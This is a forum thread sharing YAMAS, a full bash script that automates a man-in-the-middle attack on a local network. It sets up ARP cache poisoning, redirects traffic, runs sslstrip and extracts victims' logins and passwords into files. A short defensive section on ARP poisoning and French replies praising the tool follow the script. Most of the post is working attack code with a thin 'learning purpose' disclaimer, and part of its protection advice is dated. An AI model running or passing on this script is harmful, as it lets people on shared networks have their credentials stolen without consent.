Annonce

Réduire
Aucune annonce.

[Bash] YAMAS - LAN Sniffer

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [Bash] YAMAS - LAN Sniffer

    LAN Network sniffer, YAMAS is a fully automized MITM attack tool.

    Note : you need Arpspoof, sslstrip and some other dependencies installed to make it work (everything's already available on BT).

    #!/bin/bash
    # Bash script to launch man it the middle attack and sslstrip.
    # version 0.9 by comaX
    version="0.9.4"
    # if user ^C then execute cleanup function
    trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.

    fast_cleanup() {
    echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
    if [[ ${looparseid} != "" ]]; then kill ${looparseid}
    fi
    if [[ ${sslstripid} != "" ]]; then kill ${sslstripid}
    fi
    if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
    fi
    if [[ "$1" = "-e" || "$2" = "-e" ]]; then
    killall ettercap
    else
    killall arpspoof
    fi
    echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
    iptables --flush # there are probably too many resets here,
    iptables --table nat --flush # but at least we're sure everything's clean
    iptables --delete-chain
    iptables --table nat --delete-chain
    if [ -e '/tmp/looparse.sh' ]; then
    rm /tmp/looparse.sh
    fi
    if [ -e '/tmp/grepcred.txt' ]; then
    rm /tmp/grepcred.txt
    fi
    echo -e "\033[32m[-] Clean up successful !\033[m"
    exit 0
    }

    #Let's define some arguments that can be passed to the script :
    if [[ "$1" = "-p" || "$1" = "--parse" ]]; then #parse a given filename
    if [[ $2 == "" ]]; then
    echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
    exit 0
    fi
    clear
    wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
    echo -e "Parsing $2 for credentials.\n\n"
    cat $2 |
    awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
    awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
    egrep -i -a -f /tmp/grepcred.txt |
    awk -F "=" '{if (length($2) < 4) print "";
    else if ($1 ~/Website/) print $0;
    else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
    else print "Login = \t"$2}' |
    uniq
    rm /tmp/grepcred.txt
    exit 0
    fi

    if [[ "$1" = "-e" || "$2" = "-e" ]]; then
    echo -e "\tYou will be using Ettercap instead of ARPspoof."
    sleep 0.5
    fi

    if [[ "$1" = "-h" || "$1" = "--help" ]]; then #define help message
    clear
    echo -e "You are running $0, version $version.


    usage : $0 [-h -c -p]* [-e -s]**
    -h or --help : Display this help message, disclaimer and exit.

    -c or --change: Display changelog and todo.
    -e : Use ettercap instead of ARPspoof. One might have one's reasons...
    ARPspoof is default.
    -p or --parse : Only parse the given <file>. Don't use wildcards.
    Use > /output_file to print to a file.
    -s : The script won't download anything. Make sure you have the needed files.
    *Must be used alone
    **Can be used at the same time.

    \033[31m DISCLAIMER :\033[m
    This program is intended for learning purpose only. I do not condone hacking
    and wouldn't be held responsible for your actions. Only you would face legal
    consequences if you used this script for illegal activities.

    \033[31m What I think should be learnt from this script :\033[m
    This script should teach you how easy it is to steal sensitive online
    credentials and how to protect you from it, provided you understand
    what this program does. The best way to understand what it does is
    to look at its source. This will also teach you basic shell scripting."
    exit 0
    fi
    if [[ "$1" = "-c" || "$1" = "--change" ]]; then #Changelog
    clear
    echo -e "\033[31m Changelog :\033[m
    Should be added in next version/revision :
    - Submit your ideas !
    - We're close to a final version !

    Added in v0.9.x
    - Ettercap support (with -e switch in parameters)
    - Silent mode (-s)
    - Code enhancing.

    Added in v0.8.x
    - Tail-greping log file so we can be sure there is traffic being sniffed
    - New parsing method from scratch : should be lighter, less CPU consuming, and most of all, outputs websites as well.
    This should be tested though to ensure maximum reliability. Please report back !
    0.8.5 : now grep from downloaded file, to allow more updates on parsing, without updating the whole script.
    - New -p option to allow only parsing a file. (v0.8.5)
    - More improvements.
    - Catching ^C and cleanup before quitting. (v0.8.5)
    - Realtime parsing menu. (V0.8.5)

    \033[31mFeatures :\033[m
    - Output of credentials as they are sniffed in xterm window.
    - Log parsing for user-friendly output.
    - Both arpspoof and ettercap are suported
    - Network mapping for host discovery.
    - Can save \"dumped\" passwords to file.
    - Support for multiple targets on the network.
    - Can parse a single file.
    - Install sslstrip if needed.
    - Display ASCII tables for better readability of creds.
    - All options know default, pressing only enter should get you through.
    - Very neat and kewl ascii =D

    \033[31m Credits :\033[m
    Credits go to all people on backtrack forums for their help and support,
    and google for being my best friend with scripting.
    Special kudos to ShortBuss for something I should have seen a
    long time ago (sslstrip before arpspoof) and many little improvements.
    And of course, to the people responsible for the tools I am using in this script.

    Please criticize this program or submit ideas on the official thread at
    http://tinyurl.com/yamas-bt5 or send me a mail at [email protected]"
    exit
    fi

    ### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
    if [[ "$1" = "-s" || "$2" = "-s" ]]; then
    message="\nNo message to display : you are running in silent mode"
    else
    wget -q http://comax.fr/yamas/bt5/message -O /tmp/message
    message=$(cat /tmp/message) #store it to variable
    rm /tmp/message #remove temp message file
    fi

    ### Check for updates !
    if [[ "$1" = "-s" || "$2" = "-s" ]]; then
    echo "Not checking for a new version : silent mode."
    else
    wget -q http://comax.fr/yamas/bt5/version -O /tmp/version # Get last version number
    last_version=$(cat /tmp/version) #store it to variable
    rm /tmp/version #remove temp version file

    if [[ $last_version > $version ]] ; then # Comparing to current version
    echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)"
    read update
    if [[ $update = Y || $update = y ]] ; then
    echo "[+] Updating script..."
    wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
    chmod +x $0
    echo "[-] Script updated !"
    if [[ $0 != '/usr/bin/yamas' ]] ; then
    echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
    read install
    if [[ $install = Y || $install = y ]] ; then #do not proceed to install if using installed version : updating it already "installed" it over.
    cp $0 /usr/bin/yamas
    chmod +x /usr/bin/yamas
    echo "Script should now be installed, launching yamas !"
    sleep 3
    yamas
    exit 1
    else echo "Ok, continuing with updated version..."
    sleep 3
    $0
    exit 1
    fi
    fi
    sleep 2
    $0
    exit 1
    else echo "Ok, continuing with current version..."
    fi
    else echo "No update available"
    fi
    fi
    ### End of update process

    ### Install process
    if [[ ! -e '/usr/bin/yamas' ]] ; then
    echo "Script is not installed. Do you want to install it ? (Y/N)"
    read install
    if [[ $install = Y || $install = y ]] ; then
    cp -v $0 /usr/bin/yamas
    chmod +x /usr/bin/yamas
    rm $0
    echo "Script should now be installed. Launching it !"
    sleep 3
    yamas
    exit 1
    else echo "Ok, not installing then !"
    fi
    else echo "Script is installed"
    sleep 1
    fi
    ### End of install process
    clear
    echo -e "
    _______ _______ _______ _______ _______ _____
    |\ /|( ___ )( )( ___ )( ____ \ |\ /|( __ ) / ___ \
    ( \ / )| ( ) || () () || ( ) || ( \/ | ) ( || ( ) | ( ( ) )
    \ (_) / | (___) || || || || (___) || (_____ | | | || | / | ( (___) |
    \ / | ___ || |(_)| || ___ |(_____ ) ( ( ) )| (/ /) | \____ |
    ) ( | ( ) || | | || ( ) | ) | \ \_/ / | / | | ) |
    | | | ) ( || ) ( || ) ( |/\____) | \ / | (__) | _ /\____) )
    \_/ |/ \||/ \||/ \|\_______) \_/ (_______)(_)\______/ " # <= I love it.
    echo -e "===========================================================================
    =\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
    =\033[31m Use this tool responsibly, and enjoy!\033[m =
    = Feel free to contribute and distribute this script as you please. =
    = Official thread : http://tinyurl.com/yamas-bt5 =
    = Check out the help (-h) to see new features and informations =
    = You are running version \033[32m$version\033[m =
    ==========================================================================="
    echo -e "\033[36mMessage of the day :\033[m"
    echo -e "$message"
    echo
    # Starting fresh : reset IP forward and iptables
    echo -e "\033[31m [+] Cleaning iptables \033[m"
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo "[-] Cleaned."

    # Defining exit function and other ending features

    cleanup() {
    echo
    echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"

    kill ${sslstripid}
    kill ${looparseid}
    if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
    fi
    if [[ "$1" = "-e" || "$2" = "-e" ]]; then
    killall ettercap
    else
    killall arpspoof
    fi
    echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
    iptables --flush # there are probably too many resets here,
    iptables --table nat --flush # but at least we're sure everything's clean
    iptables --delete-chain
    iptables --table nat --delete-chain
    rm /tmp/looparse.sh
    rm /tmp/grepcred.txt

    echo -e "\033[32m[-] Clean up successful !\033[m"
    echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
    echo "(If you want to keep it, it will be stored in /root/$filename.txt)"
    read -e keep
    if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
    cp /tmp/$filename.txt /root/$filename.txt #moving file
    if [ -f "/root/$filename.txt" ]; then #check if it exists
    echo "Log file copied !" #it does
    else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
    fi
    else echo "Logs not saved"
    fi
    echo
    echo "Do you want to save passwords to a file? (Y=keep)"
    echo "(If you want to keep it, it will be saved in /root/$filename.pass.txt)"
    read -e keeppd
    if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
    if [[ "$1" = "-s" || "$2" = "-s" ]]; then
    echo "Not downloading needed 'grepcred.txt' file because of silent mode. Make sure you already have a copy or the parsing *will* fail."
    else
    wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
    fi
    cat /tmp/$filename.txt |
    awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
    awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
    egrep -i -a -f /tmp/grepcred.txt |
    awk -F "=" '{if (length($2) < 4) print "";
    else if ($1 ~/Website/) print $0;
    else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
    else print "Login = \t"$2}' |
    uniq >> /root/$filename.pass.txt # >> appends to a potential previous file.
    if [ -f "/root/$filename.pass.txt" ]; then #check if it exists
    echo "Passwords saved !" #it does
    else echo "Error while saving passwords" #it does not
    fi
    else echo "Password saving skipped."
    fi
    rm /tmp/$filename.txt
    echo -e "\nTemporary files deleted."

    if [ -f "/usr/bin/yamas" ]; then #check if script is already installed
    echo
    echo
    exit 1 #if yes, exit.
    else
    echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
    read -e install
    if [[ $install = "Y" || $install="y" ]] ; then
    cp ./yamas.sh /usr/bin/yamas #copy and rename script
    echo -e "\033[32m Script installed !\033[m"
    else echo "Script not installed."
    fi
    fi
    exit 1
    }

    updatestrip() {
    wget -q http://www.thoughtcrime.org/software...rip-0.9.tar.gz
    tar zxvf sslstrip-0.9.tar.gz
    cd sslstrip-0.9
    python ./setup.py install > /dev/null
    cd ..
    rm sslstrip-0.9.tar.gz
    }

    search=$(ip route show | awk '(NR == 1) { print $1}') #store gateway/24 for whole network mapping to variable
    #We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
    #so there is no need to do it twice.
    rescan () {
    echo -e "\033[31m"
    nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
    echo -en "\033[m"
    final
    }

    add_target() {
    echo "Enter a new IP adress to attack :"
    read newip
    xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
    final
    }

    ascii() {
    clear
    if [[ "$1" = "-s" || "$2" = "-s" ]]; then
    echo "ASCII tables won't be available"
    echo "ASCII tables are not available" > /tmp/ascii
    else
    wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
    cat /tmp/ascii
    rm /tmp/ascii
    fi
    final
    }

    tailsecure() {
    xterm -geometry 50x50+10+10 -T "Tail-greping for secure references" -e "tail -f /tmp/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!
    final
    }

    rtparse() {
    echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
    1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
    2. Resume RTP.
    3. Kill RTP (stop and close xterm)
    4. Re-launch RTP
    5. Previous menu."
    read rtp
    if [ "$rtp" = "1" ] ; then
    echo -e "\033[33m[+]Pausing...\033[m"
    kill -19 ${looparseid}
    echo -e "\033[33m[-]Paused.\033[m"
    rtparse
    elif [ "$rtp" = "2" ] ; then
    echo -e "\033[33m[+]Resuming...\033[m"
    kill -18 ${looparseid}
    echo -e "\033[33m[-]Resumed.\033[m"
    rtparse
    elif [ "$rtp" = "3" ] ; then
    echo -e "\033[31m[+]Killing...\033[m"
    kill ${looparseid}
    echo -e "\033[33m[-]Killed.\033[m"
    rtparse
    elif [ "$rtp" = "4" ] ; then
    echo -e "\033[32m[+]Launching...\033[m"
    xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
    sleep 2
    echo -e "\033[33m[-]Launched.\033[m"
    rtparse
    elif [ "$rtp" = "5" ] ; then
    echo "Previous"
    final
    else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
    rtparse
    fi
    }

    final() {
    echo -e "\n\033[32mAttack is running\033[m. You can :
    1. Rescan network.
    2. Add a target (useless if targeting whole network).
    3. Display ASCII correspondence table.
    4. Tail-grep hosts through output (make sure there is traffic).
    5. Real-time parsing...
    6. Quit properly.

    Enter the number of the desired option."
    read final
    if [ "$final" = "1" ] ; then
    rescan
    elif [ "$final" = "2" ] ; then
    add_target
    elif [ "$final" = "3" ] ; then
    ascii
    elif [ "$final" = "4" ] ; then
    tailsecure
    elif [ "$final" = "5" ] ; then
    rtparse
    elif [ "$final" = "6" ] ; then
    cleanup
    else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
    final
    fi
    }

    ###############################End of functions#############################

    # IP forwarding
    echo
    echo -e "\033[31m [+] Activating IP forwarding... \033[m"
    echo "1" > /proc/sys/net/ipv4/ip_forward
    echo "[-] Activated."

    #Iptables
    echo
    echo -e "\033[31m [+] Configuring iptables... \033[m"
    echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
    echo
    read -e outport
    if [ "$outport" = "" ] ; then
    outport=8080
    echo -e "Port $outport selected as default.\n"
    fi
    echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
    echo
    read -e inport
    if [ "$inport" = "" ] ; then
    inport=80
    echo -e "Port $inport selected as default.\n"
    fi
    echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
    iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
    echo "[-] Traffic rerouted"

    #Sslstrip
    echo
    echo -e "\033[31m [+] Activating sslstrip... \033[m"
    echo "Choose filename to output : (default = yamas)"
    read -e filename
    if [ "$filename" = "" ] ; then
    filename="yamas"
    fi
    echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
    #### BEGIN of update process ####
    if [[ "$1" = "-s" || "$2" = "-s" ]]; then
    echo "Not checking for updates here either. Sslstrip should be installed or attack will fail."
    sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
    else
    if [ -e '/usr/local/bin/sslstrip' ]; then # If sslstrip exists
    sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
    if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
    echo -e "Sslstrip version $sslversion is installed but a newer one (0.9) exists. Do you want to update \033[4mand\033[m install latest
    version ? [Y/N]
    Note that it will download it from the official website, but might be not supported by BT team on the forums as long as it's not in the repos. It
    should be safe to use though."
    read -e sslupdate
    if [[ $sslupdate = "Y" || $sslupdate = "y" ]] ; then #if yes, updating.
    updatestrip
    sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
    if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
    else echo "\033[33mOops, install failed.\033[m Continuing with current version."
    fi
    else echo "All right, continuing with current version."
    fi
    elif [[ $sslversion = "0.9" ]]; then
    echo -e "\n\033[32mSslstrip is up to date, continuing...\033[m"
    fi

    elif [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
    sslversion=$(cat /pentest/web/sslstrip/sslstrip.py | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
    if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
    echo -e "Sslstrip v$sslversion was found, not installed, but executable. Do you want to \033[4mU\033[mpdate or \033[4mC\033[montinue ? "
    read -e sslupdate
    if [[ $sslupdate = "U" || $sslupdate = "u" ]] ; then #if yes, updating.
    updatestrip
    sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
    if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
    sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
    sleep 3
    else echo "\033[33mOops, install failed.\033[m Continuing with current, non installed version."
    /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
    sleep 3
    fi
    else echo "All right, continuing with current, non-installed version."
    /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
    sleep 3
    fi
    fi
    elif [ -e '/pentest/web/sslstrip/sslstrip.py' ]; then
    echo "Sslstrip was found, but not installed and not executable. Making it executable... (not installing)"
    chmod +x '/pentest/web/sslstrip/sslstrip.py'
    if [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
    echo "Now it is. Continuing..."
    /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
    sleep 3
    else echo "Sslstrip couldn't be found. You might be using a wrong version of this script or it is not
    installed.
    You can download BT4r2 version of this script at http://tinyurl.com/mitm-yamas. To install sslstrip use
    apt-get install sslstrip. Do you want to install it ? (will quit after) Y/N"
    read apti
    if [[ $apti = "Y" || $apti = "y" ]] ; then
    apt-get install sslstrip
    exit 1
    fi
    fi
    fi
    fi

    sleep 2 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
    echo
    echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
    echo

    #Arpspoofing
    echo
    echo -e "\033[31m [+] Activating ARP cache poisoning... \033[m"
    echo
    ip route show | awk '(NR == 2) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
    iface=$(ip route show | awk '(NR == 2) { print $5}')
    gateway=$(ip route show | awk '(NR == 2) { print $3}') #store gateway ip
    echo
    echo "Enter IP gateway adress or press enter to use $gateway."
    read -e gateway
    if [ "$gateway" = "" ] ; then
    gateway=$(ip route show | awk '(NR == 2) { print $3}') #restore gateway ip since pressing enter set our var to null
    echo -e "$gateway selected as default.\n"
    fi
    echo
    echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
    read -e iface
    if [ "$iface" = "" ] ; then
    iface=$(ip route show | awk '(NR == 2) { print $5}') #store default interface
    echo -e "$iface selected as default.\n"
    fi
    echo -e "\r"
    echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
    Press enter to default."
    read -e choicearp
    echo

    if [[ $choicearp = "D" || $choicearp = "d" ]] ; then
    echo
    echo -e "Do you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
    read -e hosts
    echo -e "\033[31m "
    if [[ $hosts = "Y" || $hosts = "y" ]] ; then
    nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
    echo -e "\033[m " # switch color back to white
    else echo -e "\033[m "
    fi
    echo -e "Please enter targets according to usage : IP1 IP2 IP3...
    \033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
    arpspoofi() { # We launch ARPspoof in different xterm windows to keep script running
    while [ "$1" != "" ]; do
    xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
    shift
    done
    echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
    }
    ettercapi() { # We launch ARPspoof in different xterm windows to keep script running
    while [ "$1" != "" ]; do
    xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$1/ /$gateway/ 2>/dev/null & sleep 2
    shift
    done
    echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
    }
    read -e parameters
    if [[ "$1" = "-e" || "$2" = "-e" ]]; then
    ettercapi $parameters
    else
    arpspoofi $parameters
    fi

    else
    if [[ "$1" = "-e" || "$2" = "-e" ]]; then
    xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
    sleep 2
    echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
    else
    xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
    sleep 2
    echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
    fi
    fi

    echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"

    echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
    echo
    echo
    echo "looparse(){" > /tmp/looparse.sh
    if [[ "$1" = "-s" || "$2" = "-s" ]]; then sleep 0.5
    else
    echo "wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt" >> /tmp/looparse.sh
    fi
    echo "while :
    do
    clear
    echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
    cat /tmp/$filename.txt |
    awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
    awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
    egrep -i -f '/tmp/grepcred.txt' |
    awk -F \"=\" '{if (length(\$2) < 3) print \"\";
    else if (\$1 ~/[W]/) print \$0;
    else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
    else print \"Login = \t\t\", \$2}' |
    uniq
    sleep 7
    done
    }
    looparse" >> /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
    chmod +x /tmp/looparse.sh
    xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
    sleep 2
    final #call the "final" function. Yes, it's the final one.
    ### End of the script fellas.
    ---

    Well, this script is a MITM attack. But how to protect yourself of this kind of crap?!!

    How to protect yourself from Man in the Middle Attacks ? --
    Introduction -- How it works.

    In the attack Yamas uses, the vector is the poisonning of the victim's ARP cache. ARP is the protocol that will "translate" physical mac adresses into IP adresses on the local network. When an equipement wants to connect to the network, it will ask for the mac of the router's IP, eg : "Who has 192.168.1.1 ? Tell 192.168.1.2". The router then responds "198.168.1.1 [router] is at 11:22:33:44:55:66 [router]". This will be written in the ARP cache of the client. And this is where we come in play. We send spoofed ARP responses : "192.168.1.1 [router] is at 00:11:22:66:66:66 [attacker]". The client will then modify its cache to set the attacker as the router. We then forward the traffic to the real router, which allows us to read, and manilipulate the traffic on-the-fly. That's how we get the passwords. Thanks to sslstrip, we force the clients to send the credentials as clear text, so that we can simply read them.
    All right, but now, how do you protect yourself from that to happen to you ?
    Protection - Client side

    When you are a client - a website visitor - there are two things you can do : use programs, and/or your head. Program wise you'll have to find one that regularly checks for changements in the ARP tables to warn you in case of suspicious changements. Well-known ones include ARPon or ARPwatch.
    You could also use ettercap under *nux or wireshark on any platform : even though it is not their job, and they will not run all the time, they will warn you in case of duplicates ARP responses with different MAC adresses. That also can be achieved with some internet security suites, but I won't make free ad for them so you'll have to find with you friend Google.
    In the end, it's most of all a question of habits, or using your head, knowing your environnement : thou shall never - ever enter any [important] credential on unsecured connections such as public hotspots and open wifi, under any circumstances. Thou shall always check if the connection to the website is safe : the certicficate looks good, is up to date and the connection is tunneled through SSL (v3 if possible).
    Since you're here, you probably use this attack yourself, so you should be able to recognize the glitches it provokes : have to relaod the page ? Page looks weird ? Takes time to load ? Disonnected when you didn't ask for it ? Pay attention, you may be under attack !
    If you have any doubt, just don't send anything sensible over the network. It may seem obvious, but that's how you'll really protect yourself.
    Protection - Server side

    I either don't know much about it, or there's not much than I know to do. Well here's what you can do : use an encrypted connection through SSL (but that sometimes costs, and I wouldn't pay for that...) or request the passwords to be encrypted before they are sent ! This can be done with .htaccess by using AuthType Digest. By requesting an MD5 encrypted password before it transits on the network, it could be sniffed, but rendered useless since MD5 isn't that easy to crack if you're using a good password. I know I wouldn't waste time cracking and MD5 password...
    I'll try to add a module here to show you that. Meanwhile you can head over to maemo's website that uses this technique and sniff the network while doing so.


    Edit : This is not the latest available version, go and grab it at http://comax.fr/
    Dernière modification par comaX, 09 septembre 2011, 20h40.

  • #2
    Pour te remercier pour ce délicieux script, dans l'attente qu'il s'améliore encore et encore, bravo pour l'initiative et bonne chance pour son évolution prochaine qui ne peut qu'être encore plus intéressante

    Gros +30 ^^
    sigpic

    Cyprium Download Link

    Plus j'étudie plus j'me rends compte que je n'sais rien.

    †|

    Commentaire


    • #3
      Up.

      Alors, des petites améliorations lui ont été apportées ?
      sigpic

      Cyprium Download Link

      Plus j'étudie plus j'me rends compte que je n'sais rien.

      †|

      Commentaire


      • #4
        Nope, pas trop trop d'idée et un poil dans la main qui s'apparente plus à un arbre J'ai pensé à Hamster et Ferret, ce genre de choses, mais on le voit partout et même si c'était "yet another", je considère que c'est un outil à part entière, qui vaut ce qu'il vaut, mais sui generis ! Donc comme il a été pensé en mode "stop les script kiddies, essaye de piger ce que tu fais", je le trouve bien suffisant !

        Par contre je serais chaud pour en faire une version moins orientée "je t'explique tout ce qui se passe" pour en faire quelque chose de plus fonctionnel disons. Et pourquoi pas avec un label "For THC"


        Edit : ceci dit, depuis la version postée ici, oui il y a eu des *petites* améliorations.

        Commentaire


        • #5
          Salut salut !

          Un petit bump pour donner des nouvelles de Yamas.

          Pour la version BT, driftnet devrait bientôt être ajouté, et peut-être urlsnarf même si je suis un peu sceptique sur ce dernier. Peut-être une petite correction au niveau de nmap qui plante. On m'a reporté des problèmes, et comme ça fait un moment que je n'ai pas testé et mis à jour ma BT...

          Pour la version Maemo, des "collègues" travaillent à y porter arpspoof, donc le script va être réadapté en fonction. Ce sera aussi l'occasion de retravailler un peu le code ! Le problème c'est que je peux pas push sur le repo de Maemo, donc il nous faudra l'aide d'un autre copain.

          Bref, si vous ne connaissez pas encore, pourquoi ne pas tester ? C'est un script somme toute assez simple, et qui pourrait vous faire prendre conscience qu'il faut être vigilant sur internet, même à la maison.

          Amusez-vous bien !

          Commentaire


          • #6
            Petit up pour dire que c'est à jour pour BT5R3

            Commentaire

            Chargement...
            X